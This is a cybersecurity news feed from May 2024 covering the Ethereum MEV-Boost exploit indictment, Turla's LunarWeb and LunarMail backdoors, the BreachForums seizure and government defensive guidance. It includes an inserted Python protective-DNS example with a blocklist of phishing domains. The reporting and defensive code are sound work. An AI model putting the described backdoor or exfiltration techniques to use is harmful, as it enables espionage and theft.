The 15-member United Nations Security Council has long prohibited North Korea from engaging in nuclear tests and ballistic missile launches. Since 2006, the country has been under stringent UN sanctions, continuously bolstered by the Council to sever financial support for its weapons of mass destruction (WMD) development. Yet Pyongyang has amassed a staggering $3 billion in funding for its nuclear program from cyberattacks, particularly on cryptocurrency-related companies.

Gone in 12 Seconds: Siblings Siphon $25M from Ethereum Blockchain


Gone in 60 seconds is a thing of the past. With the world moving towards digital assets and cryptocurrency, “Gone in 12 seconds” seems to be the new norm for digital heists. The U.S. Department of Justice arrested two siblings for attacking the Ethereum blockchain and siphoning $25 million of cryptocurrency during a 12-second exploit.

Hailing from Boston and New York respectively, Anton Peraire-Bueno, 24, and James Peraire-Bueno, 28, stand accused of a litany of charges including conspiracy to commit wire fraud, wire fraud and conspiracy to commit money laundering. According to an indictment unsealed on Wednesday, the brothers combined the “specialized skills” from their education at MIT with their expertise in cryptocurrency trading to exploit “the very integrity of the (Ethereum) blockchain,” said U.S. Attorney Damian Williams. The brothers meticulously planned the exploit scheme for months “and once they put their plan into action, their heist only took 12 seconds to complete,” he added.
“This alleged scheme was novel and has never before been charged.”
Through the exploit, believed to be the very first of its kind, the Peraire-Bueno brothers manipulated and tampered with the process and protocols by which transactions are validated and added to the Ethereum blockchain.

The MEV Conundrum from Ethereum Blockchain Exploit

According to the indictment, the Peraire-Bueno brothers initiated their scheme in December 2022, targeting specific traders on the Ethereum platform through what investigators term a "baiting" operation. At the heart of the indictment lies MEV-Boost, a software tool used by Ethereum validators to optimize transaction processing and maximize profitability. MEV, or maximal extractable value, has long been a subject of controversy within the cryptocurrency community, with proponents arguing its economic necessity and critics highlighting its potential for abuse.

The brothers exploited a critical flaw in MEV-Boost's code, granting them unprecedented access to pending transactions before their official validation by Ethereum validators. Leveraging this loophole, the siblings embarked on a sophisticated campaign targeting specific traders who used MEV bots.

The indictment describes the modus operandi of the accused duo. The brothers created 16 Ethereum validators and targeted three specific traders who operated MEV bots, the indictment said. By establishing their own Ethereum validators and deploying bait transactions, they lured these traders' MEV bots into their scheme. Subsequently, through a series of meticulously orchestrated maneuvers, including frontrunning and transaction tampering, they siphoned off $25 million of cryptocurrency from unsuspecting victims, all in just 12 seconds.

Following the execution of their scheme, the brothers allegedly laundered the ill-gotten gains through a network of shell companies. Converting the stolen funds into more liquid cryptocurrencies such as DAI and USDC, they attempted to rebuff efforts by victims and Ethereum representatives to recover the stolen cryptocurrency. Following their arrest on Tuesday, the brothers are set to appear in federal courts in New York and Boston to face charges.
If convicted the brothers face a maximum sentence of up to 20 years in prison for each count. Deputy Attorney General Lisa Monaco lauded the Justice Department’s prosecutors and IRS agents, “who unraveled this first-of-its kind wire fraud and money laundering scheme.”
“As cryptocurrency markets continue to evolve, the Department will continue to root out fraud, support victims, and restore confidence to these markets.”

Cryptocurrency Heists and Convictions Growing Every Day

The news of the arrest comes on the heels of another crypto heist, this one from Sonne Finance, a cryptocurrency lending protocol. The team at Sonne Finance is offering an undisclosed bounty to the hacker responsible for a $20 million theft on Tuesday evening. Sonne Finance facilitates lending and borrowing without intermediaries like banks. The theft, tracked by blockchain security companies, involved digital coins such as ether and USDC. Developers paused all markets and later detailed the attack in a postmortem, offering a bounty for the return of funds. They detected the attack within 25 minutes, and some users prevented a $6.5 million theft. The hacker has since been exchanging the stolen cryptocurrency for bitcoin and other coins.

Law enforcement focus on crypto theft has intensified in 2024, with notable convictions including a $110 million theft from Mango Markets resulting in up to 30 years in prison, and sentences for individuals involved in crypto scams and market manipulation.

Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert – Source: securityboulevard.com


Source: securityboulevard.com – Author: Wajahat Raja

In the digital realm, security is paramount, especially when it comes to the applications we use daily. Recently, concerns have surfaced regarding vulnerabilities in popular Android applications available on the Google Play Store. Revelations by the Microsoft Threat Intelligence team have unearthed a WPS Office exploit dubbed the Dirty […]

The post Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert – Source: securityboulevard.com appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.

Beyond Borders: CISA Addresses the Global Influence on US Election Cybersecurity


During a recent Senate committee hearing, Director of National Intelligence Avril Haines emphasized the continued prominence of state hackers as a threat, citing their aims to undermine trust in U.S. democratic institutions and exacerbate societal divisions. The hearing follows the rising threat of a potential cyberattack on the US election, which has intensified over the last few months, with foreign interference peaking as many state actors aim to launch cyberattacks on the upcoming US elections in 2024.

The 2024 United States elections are slated to take place on Tuesday, November 5, 2024. In this crucial presidential election cycle, the nation will elect its president and vice president. Leveraging the attention on these events, several state-backed hackers are running multiple threat campaigns to target the integrity of the US election and possibly accomplish their own agendas.

Democratic Senator Mark Warner, chairman of the Senate Intelligence Committee, expanded on the scope of foreign influence efforts, including not only state actors but also non-state entities like hacktivists and cybercriminals. Warner stressed the ease with which these actors can now infiltrate and disrupt U.S. politics, emphasizing the increasingly low barriers to entry for such malicious activities.

Potential Cyberattack on the US Election: A Pressing Concern!

https://www.youtube.com/watch?v=WphVoguvVd8

At the forefront of defending against this potential cyberattack on the US election is the Cybersecurity and Infrastructure Security Agency (CISA). In a recent update on foreign threats to the 2024 elections, CISA Director Jen Easterly outlined the agency's efforts to safeguard election infrastructure since its designation as critical infrastructure in 2017.

"While our election infrastructure is more secure than ever, today’s threat environment is more complex than ever. And we are very clear eyed about this. As the DNI noted, our foreign adversaries remain a persistent threat to our elections, intent on undermining Americans’ confidence in the foundation of our democracy and sowing partisan discord, efforts which could be exacerbated by generative AI capabilities," said Jen Easterly.

Despite these persistent threats, Easterly highlighted the successful conduct of secure federal elections in 2018, 2020, and 2022, with no evidence of vote tampering. However, Easterly cautioned against complacency, noting the complexity of ransomware groups and other threat actors and their unconventional modus operandi. Foreign hackers remain intent on undermining confidence in U.S. democracy, compounded by the proliferation of generative AI capabilities. Easterly also highlighted the rise in large-scale attacks on US elections targeting political leaders and other election officials, fueled by baseless claims of electoral fraud.

CISA’s Plan To Bolster Cybersecurity in the Upcoming US Election

In response to these threats to the upcoming US elections, CISA has intensified its efforts, expanding its services and outreach to election stakeholders across the nation. From cybersecurity assessments to physical security evaluations and training sessions, CISA has been actively engaged in fortifying the security of the upcoming election and its infrastructure. The agency has also ramped up efforts to combat disinformation, providing updated guidance and amplifying the voices of state and local election officials.

Despite the political nature of elections, Easterly emphasized that election security remains apolitical. CISA remains steadfast in its commitment to preserving the integrity of the electoral process and looks to the support of leaders in this endeavor. As the nation prepares for future elections, bolstering cybersecurity measures and defending against foreign influence operations remain central priorities.


Learn more about how CISA is helping to #Protect2024: cisa.gov/protect2024

Russian Hackers Used Two New Backdoors to Spy on European Foreign Ministry


Researchers recently uncovered two new backdoors implanted within the infrastructure of a European Ministry of Foreign Affairs (MFA) and its diplomatic missions. Slovak cybersecurity firm ESET, which found the two backdoors and dubbed them “LunarWeb” and “LunarMail,” attributed them to the Turla cyberespionage group, believed to be aligned with Russian interests.

Turla has operated since at least 2004, possibly starting in the late 1990s. Linked to the Russian FSB, Turla primarily targets high-profile entities like governments and diplomatic organizations in Europe, Central Asia and the Middle East. Notably, the group has breached significant organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. Researchers believe the Lunar toolset, in use since at least 2020, is an addition to the arsenal of the Russia-aligned cyberespionage group Turla, based on the similarities between the tools’ tactics, techniques, and procedures (TTPs) and Turla's past activities.

LunarWeb Backdoor: Used to Navigate the Digital Terrain

The LunarWeb backdoor stealthily infiltrates servers, establishing a foothold within the targeted infrastructure. Operating covertly, it communicates via HTTP(S) while mirroring legitimate traffic patterns to obscure its presence. Concealment is key in LunarWeb's playbook: the backdoor uses steganography, covertly embedding commands within innocuous images to evade detection mechanisms. LunarWeb's loader, aptly named LunarLoader, showcases remarkable versatility, the researchers noted. Whether masquerading as trojanized open-source software or operating in standalone form, this entry point demonstrates the adaptability of the adversary's tactics.

LunarMail: Used to Infiltrate Individual Workstations

LunarMail takes a different approach from LunarWeb: it embeds itself within Outlook on workstations. Leveraging the familiar environment of email communications, this backdoor carries out its spying activities while remaining hidden amidst the daily deluge of digital correspondence that its victims receive on their workstations.

[Image: LunarMail operation (credit: ESET)]

On first run, the LunarMail backdoor collects information on the environment variables and the email addresses of all outgoing email messages. It then communicates with the command and control server through the Outlook Messaging API to receive further instructions. LunarMail is capable of writing files, setting email addresses for C&C communication, creating and executing arbitrary processes, taking screenshots and more.

Similar to its counterpart, LunarMail harnesses steganography, albeit within the confines of email attachments. By concealing commands within image files, it maintains its covert communication channels undetected. LunarMail's integration with Outlook extends beyond mere infiltration: it manipulates email attachments, seamlessly embedding encrypted payloads within image files or PDF documents, which facilitates unsuspicious data exfiltration.

Initial Access and Discovery

The initial access vectors of the Turla hackers, though not definitively confirmed, point towards the exploitation of vulnerabilities or spearphishing campaigns. The abuse of Zabbix network monitoring software is also a potential avenue of compromise, the researchers said. The compromised entities were primarily affiliated with a European MFA, which meant the intrusion was of a strategic nature.

The investigation first began with the detection of a loader decrypting and running a payload from an external file, on an unidentified server. This was a previously unknown backdoor, which the researchers named LunarWeb. A similar attack chain with LunarWeb was then found deployed at a diplomatic institution of a European MFA but with a second backdoor – named LunarMail. In another attack, researchers spotted simultaneous deployments of a chain with LunarWeb at three diplomatic institutions of this MFA in the Middle East, occurring within minutes of each other. “The attacker probably had prior access to the domain controller of the MFA and utilized it for lateral movement to machines of related institutions in the same network,” the researchers noted.

The threat actors displayed varying degrees of sophistication in the compromises. The coding errors and different coding styles used to develop the backdoors suggested that “multiple individuals were likely involved in the development and operation of these tools.”

Russian State Hackers Pose the Biggest Cyber Threat

Recently, Google-owned Mandiant in a detailed report stated with “high confidence” that Russian state-sponsored cyber threat activity poses the greatest risk to elections in regions with Russian interest including the European Union, the United Kingdom and the United States. Russia’s approach to election interference is multifaceted, blending cyber intrusion activities with information operations aimed at influencing public perceptions and sowing discord.

Russian state-aligned cyber threat actors target election-related infrastructure for various reasons including applying pressure on foreign governments, amplifying issues aligned with Russia’s national interests, and retaliating against perceived adversaries. Groups like APT28 and UNC4057 conduct cyber espionage and information operations to achieve these objectives, Mandiant said.

Josh Krueger of Project Hosts, Inc. Appointed to Federal Secure Cloud Advisory Committee

By: Alan J
16 May 2024 at 07:10

Josh Krueger, the Chief Information Security Officer at Project Hosts, Inc., has been appointed to the Federal Secure Cloud Advisory Committee (FSCAC). This prestigious committee plays a crucial role in advising the Federal Risk and Authorization Management Program (FedRAMP) on various aspects of cloud computing adoption and security. The FSCAC appointment recognizes Mr. Krueger's expertise and Project Hosts' ongoing efforts to support secure cloud-computing practices and compliance standards, benefiting users and providers of cloud services. The Federal Risk and Authorization Management Program (FedRAMP) is a government-wide compliance initiative in the United States that offers a standardized framework for security assessment, authorization, and continuous monitoring of cloud products and services.

FSCAC Appointment Includes New Chair and Three Members

Along with Josh Krueger's appointment, Lawrence Hale, the deputy assistant commissioner within the Office of Information Technology Category Management for GSA's Federal Acquisition Service, will serve as the new chair of the FSCAC. In this capacity, Hale will act as a liaison and spokesperson for the committee's work products, in addition to his oversight responsibilities. Josh Krueger and Kayla Underkoffler, the lead security technologist of HackerOne, will fill the vacant seats. Krueger's term will run through July 9, 2026, while Underkoffler's term will end on May 14, 2025. Carlton Harris, the senior vice president of End to End Solutions, has been appointed as the third new member of the FSCAC, with a three-year term ending on May 14, 2027. While not among the recent appointees, Michael Vacirca, a senior engineering manager at Google, has been reappointed to the federal panel for a full three-year term after serving for one year. His term will conclude on May 14, 2027. As an appointed Representative Member of the FSCAC, Mr. Josh Krueger is expected to bring unique perspectives to the delivery of FedRAMP's Compliance-as-a-Service solutions. The role at the committee will involve representing the needs and viewpoints of businesses both small and large in the cloud-computing industry, and ensuring their interests are considered in federal discussions and strategies around cloud adoption.

Responsibilities of the Federal Secure Cloud Advisory Committee

The FSCAC was formed by the General Services Administration in February 2023, in compliance with the FedRAMP Authorization Act of 2022, which is part of the National Defense Authorization Act for fiscal year 2023. The committee's primary responsibilities include advising and providing recommendations to the GSA Administrator, the FedRAMP Board, and various agencies on technical, financial, programmatic, and operational matters related to the secure and effective adoption of cloud computing products and services across different sectors. The committee also plays a significant role in examining the operations of FedRAMP, seeking ways to continually improve authorization processes, and collecting information and feedback on agency compliance with the implementation of FedRAMP requirements. Additionally, the FSCAC serves as a forum for communication and collaboration among all stakeholders within the FedRAMP community. The FSCAC will hold an open meeting on May 20th to discuss its next priorities, which are expected to further enhance the security and adoption of cloud computing solutions across the federal government.

Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert

16 May 2024 at 03:00

In the digital realm, security is paramount, especially when it comes to the applications we use daily. Recently, concerns have surfaced regarding vulnerabilities in popular Android applications available on the Google Play Store. Revelations by the Microsoft Threat Intelligence team have unearthed a WPS Office exploit dubbed the Dirty Stream attack, casting a spotlight on […]

The post Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert appeared first on TuxCare.

The post Xiaomi and WPS Vulnerabilities: File Overwrite Risks Alert appeared first on Security Boulevard.

GhostSec Announces Shift in Operations from Ransomware to Hacktivism

By: Alan J
16 May 2024 at 04:49

GhostSec, a threat actor group previously involved in financially motivated cybercrime, announced a significant shift in focus: a departure from cybercrime and ransomware operations back to its original hacktivist aims. The announcement of GhostSec's return to its hacktivism roots marks a notable change in the group's priorities and operational strategy, leading several observers to speculate that the stated departure follows recent law enforcement actions against international ransomware groups. The GhostSec group identifies itself as part of the Anonymous collective and is known to have been active since 2015. The group used hashtags such as #GhostSec or #GhostSecurity to promote its activities and was previously involved in the #OpISIS, #OpNigeria, and #OpIsrael campaigns.

GhostSec Will Transfer Existing Ransomware Clients to Stormous

In an announcement made on its Telegram channel, the GhostSec group stated that it had gathered sufficient funds from its ransomware operations to support other activities moving forward. Rather than completely abandoning its previous work, the transition includes transferring existing clients to the new Stormous locker operated by Stormous, a partner organization with which GhostSec will also share the source code of the V3 Ghostlocker ransomware strain.

[Image: GhostSec Returns to Hacktivism. Source: GhostSec Telegram Channel]

They claim that these efforts will ensure a smooth transition to Stormous' services while avoiding the exit scams or disruption risks typically associated with ransomware exits. Stormous will also take over GhostSec's associates within the Five Families collective, which previously consisted of GhostSec, ThreatSec, Stormous, BlackForums, and SiegedSec. While GhostSec will halt some of its earlier services, the group intends to maintain its private channel and chat room. The group announced a discount offer starting today and lasting until May 23rd for lifetime access to its private channel and chat room, reducing the price from $400 to $250. The group also suggested the possibility of offering a hacking course, although the details are still being debated.

GhostSec Returns to Hacktivism

The announcement expressed GhostSec's intention to focus solely on hacktivism, a form of activism that employs hacking to promote social or political agendas. GhostSec has a record of intense hacktivist operations and campaigns, such as its efforts in 2015 to take down hundreds of ISIS-associated websites and social media accounts, reportedly halting potential terrorist attacks. The group used social media hashtags like #GhostSec, #GhostSecurity, or #OpISIS to promote its activities and participate in hacktivist initiatives against the terrorist group. GhostSec also promoted a project ("New Blood") to assist newcomers in picking up hacking skills to participate in its campaigns, and provided resources to help activists anonymize their identities, such as WeFreeInternet, a project that sought to offer free VPN facilities to Iranian activists. The group had stated its intent to expand the project to support activists in similar circumstances whose internet access is restricted by governments worldwide. The official GhostSec Telegram channel where the announcement took place was created on October 25, 2020, and the group is known to use its social media handles on various websites to promote its activities. It is important to note that the group's decision to depart from the cybercrime scene does not necessarily imply a shift towards more ethical practices. Furthermore, the group's involvement in financially motivated cybercrime raises questions about its true motivations and the potential for its hacktivism to be used for personal gain or a dubious political agenda rather than genuine social change.

UK NCSC to Defend ‘High-Risk’ Political Candidates from Cyberattacks

In response to heightened cyber threats targeting political candidates, election officials and civil society groups, the National Cyber Security Centre (NCSC) in the UK, a part of GCHQ, has introduced a new initiative called the Personal Internet Protection (PIP) service. The service, unveiled at CYBERUK 2024 in Birmingham, aims to provide an additional layer of security to individuals at “high-risk” of cyberattacks such as spear-phishing, malware and other threats, ahead of the upcoming election year. The Personal Internet Protection service works by alerting users when they attempt to access malicious domains known to the NCSC and by blocking outgoing traffic to these domains. The PIP offered to high-risk individuals is built on the NCSC’s Protective DNS (PDNS) service, which was developed primarily for use by organizations. Since its inception in 2017, PDNS has provided protection at scale for millions of public sector users, handling more than 2.5 trillion site requests and preventing access to 1.5 million malicious domains, the NCSC said.
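The protective DNS mechanism described above, refusing lookups of domains on a known-malicious list and alerting on the attempt, can be illustrated with a small policy engine. The following is an added example written for this page, not NCSC's PDNS or PIP code; the blocklist, allowlist, query log and the NXDOMAIN-style blocked response are all constructed assumptions. It goes slightly beyond the text by showing two details a real resolver policy has to get right: subdomains of a blocked domain are blocked too, but a name that merely contains a blocked string (notmalicious.example) is not.

```python
"""
Toy protective-DNS policy engine (added illustration; not NCSC's PDNS/PIP code).

Assumes a constructed blocklist, a constructed allowlist, and a constructed
query log of the form "<client> <qname>". For each query it decides whether
the resolver should answer normally or return a blocked (assumed NXDOMAIN)
response, and emits an alert record for every blocked attempt.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Constructed blocklist: stand-in for the malicious-domain feed a protective
# DNS service maintains. Entries are domains; any subdomain also matches.
BLOCKLIST: Set[str] = {
    "malicious.example",
    "phish-login.example",
}

# Constructed allowlist: checked first, so an over-broad block entry does not
# break a legitimate host underneath it.
ALLOWLIST: Set[str] = {"safe.malicious.example"}


@dataclass(frozen=True)
class Decision:
    qname: str              # normalised query name
    client: str             # requesting client address
    action: str             # "resolve" or "block"
    matched: Optional[str]  # blocklist entry that matched, if any


def normalise(qname: str) -> str:
    """Lower-case and strip the trailing dot so 'Evil.Example.' == 'evil.example'."""
    return qname.rstrip(".").lower()


def find_match(qname: str, entries: Set[str]) -> Optional[str]:
    """Return the most specific entry that qname equals or is a subdomain of.

    Matching walks label boundaries, so 'notmalicious.example' does NOT match
    'malicious.example' even though it contains that string.
    """
    labels = normalise(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in entries:
            return candidate
    return None


def decide(qname: str, client: str,
           blocklist: Set[str] = BLOCKLIST,
           allowlist: Set[str] = ALLOWLIST) -> Decision:
    """Apply allowlist-then-blocklist policy to a single query."""
    name = normalise(qname)
    if find_match(name, allowlist) is not None:
        return Decision(name, client, "resolve", None)
    match = find_match(name, blocklist)
    if match is None:
        return Decision(name, client, "resolve", None)
    return Decision(name, client, "block", match)


def process_log(lines: Iterable[str]) -> Tuple[List[Decision], List[str]]:
    """Run the policy over constructed '<client> <qname>' lines.

    Returns every decision plus one alert line per blocked query; the alert is
    what a user-facing notification or SOC feed would be built from.
    """
    decisions: List[Decision] = []
    alerts: List[str] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        client, qname = line.split()
        d = decide(qname, client)
        decisions.append(d)
        if d.action == "block":
            # "NXDOMAIN" is the assumed blocked response; real services differ.
            alerts.append(f"ALERT client={client} qname={d.qname} "
                          f"matched={d.matched} action=NXDOMAIN")
    return decisions, alerts


# Constructed query log (not real traffic).
SAMPLE_QUERIES = """\
# <client> <qname>
10.0.0.5 www.example.org.
10.0.0.5 login.phish-login.example
10.0.0.9 MALICIOUS.EXAMPLE.
10.0.0.9 safe.malicious.example
10.0.0.7 notmalicious.example
"""

if __name__ == "__main__":
    decisions, alerts = process_log(SAMPLE_QUERIES.splitlines())
    for d in decisions:
        print(d)
    for a in alerts:
        print(a)
```

Running the block prints five decisions and two alert lines (the phishing subdomain and the upper-cased blocked domain); the allowlisted host and the look-alike name resolve normally.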

Cyber Threats Targeting Political Candidates

The Personal Internet Protection service is part of a broader effort by the UK government to enhance cyber support for individuals and organizations crucial to the democratic process, especially considering recent attempts by Russian and Chinese state-affiliated actors to disrupt the UK's government and political institutions as well as individuals. While the Russian intelligence services had attempted to use cyberattacks to target prominent persons and organizations in the UK to meddle in electoral processes, China is likely behind attacks targeting various government agencies including the Ministry of Defence (MoD), whose payroll system was recently breached. Although both Moscow and Beijing have rejected the use of hacking for political purposes, the UK's relations with both countries remain strained over these allegations. Jonathon Ellison, NCSC Director for National Resilience and Future Technology, noted the importance of protecting individuals involved in democracy from cyber threats, highlighting the attractiveness of their personal accounts to espionage operations.
“Individuals who play important roles in our democracy are an attractive target for cyber actors seeking to disrupt or otherwise undermine our open and free society. That’s why the NCSC has ramped up our support for people at higher risk of being targeted online to ensure they can better protect their accounts and devices from attacks,” Ellison said.
Ahead of a major election year in which more than 50 countries around the world will cast their votes, Ellison urged individuals eligible for the Personal Internet Protection service to sign up and to follow the NCSC's guidance to bolster defenses against various cyber threats. The initiative also extends support to civil society groups facing a heightened risk of cyber threats. A new guide, "Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society," which offers practical advice for individuals such as elected officials, journalists, activists, academics, lawyers and dissidents, was released on Tuesday. This guide, developed by the U.S. Cybersecurity and Infrastructure Security Agency in collaboration with international partners, aims to empower high-risk civil society communities with limited resources to combat cyber threats effectively. The accompanying resources include customized risk assessment tools, helplines for digital emergencies and free or discounted cybersecurity services tailored to the needs of civil society organizations. The launch of the Personal Internet Protection service and the release of the guidance for civil society mark significant steps in bolstering the cybersecurity posture of individuals and organizations critical to the democratic process. By enhancing protection against cyber threats, the UK aims to safeguard the integrity of its democracy and promote collective resilience against global threats to democracy.

FBI Seized BreachForums’ Web Domains and Telegram Accounts

The notorious BreachForums has been seized for the second time in a year. U.S. law enforcement today seized the clear web domain of the second version of BreachForums - popularly known as the Breached hacking forum in the underground market - which helped sell stolen data and credentials. Hosted at BreachForums[.]st, the domain now shows a seizure banner saying the website was taken down by the FBI and the U.S. Department of Justice with assistance from international partners. Other law enforcement authorities worldwide were also part of this action, including the Australian Federal Police, the U.K. National Crime Agency, New Zealand Police, the police department of the canton of Zürich in Switzerland and the Icelandic Police, among others. As is common with domain seizure messages, law enforcement displayed the logo for the site. It however took an unconventional approach by also featuring two avatars - likely of BreachForums' administrators "Baphomet" and "ShinyHunters" - behind bars in the seizure banner.

BreachForums Seized

The message on the banner reads: "We are reviewing this site's backend data. If you have information to report about cybercriminal activity on BreachForums, please contact us." Law enforcement has also shared a link to a form hosted on the Internet Crime Complaint Center. The FBI has put out a questionnaire for victims or individuals who have information to assist in any of the investigations against BreachForums v2, BreachForums v1, or Raidforums. A summary of the takedown of BreachForums on this portal says: "The Federal Bureau of Investigation (FBI) is investigating the criminal hacking forums known as BreachForums and Raidforums. From June 2023 until May 2024, BreachForums (hosted at breachforums.st/.cx/.is/.vc and run by ShinyHunters) was operating as a clear-net marketplace for cybercriminals to buy, sell, and trade contraband, including stolen access devices, means of identification, hacking tools, breached databases, and other illegal services." Earlier, a separate version of BreachForums hosted at breached.vc/.to/.co and run by pompompurin between March 2022 and 2023 was seized by U.S. law enforcement in June 2023. Raidforums, hosted at raidforums.com and run by an admin under the moniker "Omnipotent", was the predecessor hacking forum to both versions of BreachForums and ran from early 2015 until February 2022. *The Telegram channel of "Baphomet," one of the administrators behind BreachForums, has also been seized, according to a pinned message from law enforcement on his channel.

[Image: BreachForums Seized. Credit: Dark Web Intelligence]

ShinyHunters Confirms Baphomet's Arrest

*ShinyHunters, one of the administrators of BreachForums, allegedly confirmed on a Telegram channel called "BF Announcements" the arrest of Baphomet and said that law enforcement did not get to anyone from the ShinyHunters gang.

[Image: BreachForums Seized. Message on BF Announcements Telegram channel]

Later in the same channel, the administrator claimed that the domain had been recovered from law enforcement's control, as was the case during the BreachForums v1 takedown, where the cat and mouse game between the two went on for a while. The Cyber Express tried to verify this claim and saw that the domain is now redirecting to a Telegram chat group called "Jacuzzi 2.0". The FBI and Justice Department spokespersons were not immediately available for comment when contacted by The Cyber Express for details on the latest claims. This is a developing story. The article will be updated with the latest information as it becomes available. Update 1*: Added Telegram account seizure details along with screenshot. Update 2* May 16 - 9:40 AM (UTC): Added details from ShinyHunters' BF Announcements Telegram channel that allegedly confirmed the arrest of Baphomet, one of the administrators of BreachForums.

CISA Alert: GitLab Password Exploit – Act Now For Protection

15 May 2024 at 03:00

In the realm of cybersecurity, vigilance is paramount. Recently, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flagged a critical vulnerability in GitLab, a popular platform for collaborative software development. This GitLab password exploit tracked as CVE-2023-7028, has been actively exploited in the wild, posing significant risks to organizations utilizing GitLab for their development workflows. […]

The post CISA Alert: GitLab Password Exploit – Act Now For Protection appeared first on TuxCare.

The post CISA Alert: GitLab Password Exploit – Act Now For Protection appeared first on Security Boulevard.

Banco Santander Confirms Data Breach, Assures Customers’ Transactions Remain Secure

By: Alan J
15 May 2024 at 06:30

Santander, one of the largest banks in the eurozone, confirmed that an unauthorized party had gained access to a database containing customer and employee information. The Banco Santander data breach is stated to stem from the database of a third-party provider and to be limited to some of the bank's customers in specific regions where it operates, as well as some of its current and former employees. The bank's own operations and systems are reportedly unaffected. Banco Santander is a banking services provider founded on March 21, 1857 and headquartered in Madrid, Spain. The provider operates across Europe, North America, and South America. Its services include global payment services, online banking and digital assets.

Customer and Employee Data Compromised in Santander Data Breach

The bank reported that upon becoming aware of the data breach, it immediately implemented measures to contain the incident, such as blocking access to the database from the compromised source and establishing additional fraud prevention mechanisms to protect impacted customers and affected parties. After conducting an investigation, the bank determined that the leaked information stemmed from a third-party database and consisted of details of customers from Santander Chile, Spain and Uruguay, along with some data on current and former Santander employees. Despite the third-party database breach, customer data from Santander markets and businesses operating in other regions was not affected.

[Image: Santander Data Breach. Source: santander.com]

The bank apologized for the incident and acknowledged concerns arising from the data breach, taking action to directly notify the affected customers and employees. The security team also informed regulators and law enforcement of the incident details, stating that the bank would continue to work with them during the investigation. Santander assured its customers that no transactional data, nor transaction-facilitating credentials such as banking details and passwords, were contained in the database. The statement reported that neither the bank's operations nor its systems were affected, and that customers could continue with secure transactions. Along with the official statement in response to the data breach, the bank provided additional advice on its site on dealing with the breach:
  • Santander will never ask you for codes, OTPs or passwords.
  • Always verify information you receive and contact us through official bank channels.
  • If you receive any suspicious message, email or SMS report it to your bank directly or by contacting reportphishing@gruposantander.com.
  • Never access your online banking via links from suspicious emails or unsolicited emails.
  • Never ignore security notifications or alerts from Santander related to your accounts.

Financial and Banking Sector Hit By Data Breaches

Increased cyber threats and third-party database exposure, as in the Santander data breach, pose serious concerns for stability within the financial and banking sector. The International Monetary Fund noted in a blog post last month that these incidents could erode confidence in the financial system, disrupt critical services, or cause spillovers to other institutions. In March, the European Central Bank instructed banks within the European region to implement stronger measures in anticipation of cyber attacks. Earlier, the body had stated that it would conduct a resilience stress test on at least 109 of its directly supervised banks in 2024. The initiatives come as part of broader concern about the security of European banks. Last year, data from Deutsche Bank AG, Commerzbank AG and ING Groep NV were compromised after the CL0P ransomware group exploited a security vulnerability in the MOVEit file transfer tool. The European Central Bank's site states that its banking supervisors rely on the stress tests to gather information on and assess how well the banks would be able to cope with, respond to and recover from a cyberattack, rather than just their ability to prevent attacks. The response and recovery assessments are described as including the activation of emergency procedures and contingency plans as well as the restoration of usual operations. The site states that the test results would then be used to help supervisors identify weaknesses to be discussed in dialogue with the banks.

CISA, FBI, and DHS Release Cybersecurity Blueprint for Civil Society

CISA, in collaboration with DHS, FBI, and international cybersecurity entities, has revealed a comprehensive guide aimed at bolstering cybersecurity for civil society organizations, particularly those facing heightened risks from state-sponsored cyber threats.  The guide, titled "Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society," offers practical steps to enhance digital defenses for nonprofits, advocacy groups, academic institutions, journalists, and other high-risk groups. Talking about this cybersecurity plan for civil society organizations, Jen Easterly, Director of CISA, stated that threat actors aim to undermine democratic and humanitarian values upheld by civil society.  “These high-risk community organizations often lack cyber threat information and security resources. With our federal and international partners, we are providing this resource to help these organizations better understand the cyber threats they face and help them improve their cyber safety”, added Easterly.

CISA, FBI, and DHS Collaborate to Support Cybersecurity for Civil Society

Civil society organizations play a crucial role in upholding democratic values, making them prime targets for malicious cyber activities orchestrated by state-sponsored actors. These threats, often originating from countries like Russia, China, Iran, and North Korea, include sophisticated tactics such as social engineering and spyware deployment. The security guide emphasizes proactive measures and best practices tailored to the unique challenges faced by civil society entities. Recommendations include regular software updates, the adoption of phishing-resistant multi-factor authentication, and the implementation of the principle of least privilege to minimize vulnerabilities. Furthermore, the guide stresses the importance of cybersecurity training, vendor selection diligence, and the development of incident response plans. It also guides individual members of civil society, advising on password security, privacy protection, and awareness of social engineering tactics. The release of this security guidance highlights a broader effort to empower high-risk communities with the knowledge and tools needed to safeguard against cyber threats. International collaboration, as evidenced by partnerships with entities from Canada, Estonia, Japan, and the United Kingdom, further enhances the effectiveness of these initiatives. John Scott-Railton, senior researcher at CitizenLab, emphasized the need for cybersecurity for civil societies on X (previously Twitter). Talking about this new initiative, John stated, “Historically law enforcement & governments in democracies have been achingly slow to recognize this issue and help out groups in need.” Despite some exceptions, the lack of prioritization has resulted in damages, including missed opportunities for accountability and diminished trust. “That's why I'm glad to see this @CISAgov & UK-led joint initiative come to fruition”, added John.

Aiming for Better Protection Against Cyber Threats

Government agencies and cybersecurity organizations worldwide have joined forces to support civil society against online threats. For instance, the FBI, in conjunction with its partners, aims to equip organizations with the capacity to defend against cyber intrusions, ensuring that entities dedicated to human rights and democracy can operate securely. "The FBI and its partners are putting out this guidance so that civil society organizations have the capacity to mitigate the threats that they face in the cyber realm,” said Assistant Director Bryan Vorndran of the FBI’s Cyber Division. Similarly, international partners like Japan's National Center of Incident Readiness and Strategy for Cybersecurity and Estonia's State Information Authority stress the importance of collective action in addressing global cyber threats. These collaborations reflect a shared commitment to bolstering cybersecurity resilience on a global scale. The guide also provides valuable insights into the tactics and techniques employed by state-sponsored actors, enabling organizations to make informed decisions regarding cybersecurity investments and resource allocation. In addition to the guidance document, a range of resources and tools are available to assist high-risk communities in enhancing their cyber defenses. These include customized risk assessment tools, helplines for digital emergencies, and free or discounted cybersecurity services tailored to the needs of civil society organizations. By leveraging these resources and fostering international cooperation, civil society can better defend against cyber threats and continue its vital work in promoting democracy, human rights, 